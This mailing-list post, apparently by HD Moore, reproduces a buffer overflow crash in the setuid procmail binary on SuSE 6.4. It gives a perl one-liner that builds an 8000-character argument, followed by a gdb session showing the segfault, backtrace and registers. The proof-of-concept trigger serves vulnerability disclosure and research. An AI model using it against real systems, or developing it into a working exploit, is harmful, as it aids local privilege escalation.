Vulnerability Development: Re: Buffer overflow in procmail [suid!]

[HD Moore <hdmoore () DIGITALDEFENSE NET>]

SuSE 6.4 -

odin:~/scripts # export X=`perl -e "print 'A'x8000;"`
odin:~/scripts # gdb procmail
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-suse-linux"...(no debugging symbols
found)...
(gdb) r x=$X
Starting program: /usr/bin/procmail x=$X

Program received signal SIGSEGV, Segmentation fault.
0x8050d66 in wait () at ../sysdeps/unix/bsd/bsd4.4/wait.c:30
30      ../sysdeps/unix/bsd/bsd4.4/wait.c: No such file or directory.
(gdb) bt
#0  0x8050d66 in wait () at ../sysdeps/unix/bsd/bsd4.4/wait.c:30
#1  0xbfffb97c in ?? ()
#2  0x804aad2 in wait () at ../sysdeps/unix/bsd/bsd4.4/wait.c:30
#3  0x164a5e in __libc_start_main () at
../sysdeps/generic/libc-start.c:93
(gdb) info all-registers
eax            0x8059541        134583617
ecx            0x0      0
edx            0x0      0
ebx            0x8059522        134583586
esp            0xbfffb774       0xbfffb774
ebp            0xbfffb78c       0xbfffb78c
esi            0x80617fb        134617083
edi            0x8062000        134619136
eip            0x8050d66        0x8050d66
eflags         0x10206  66054
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
(gdb)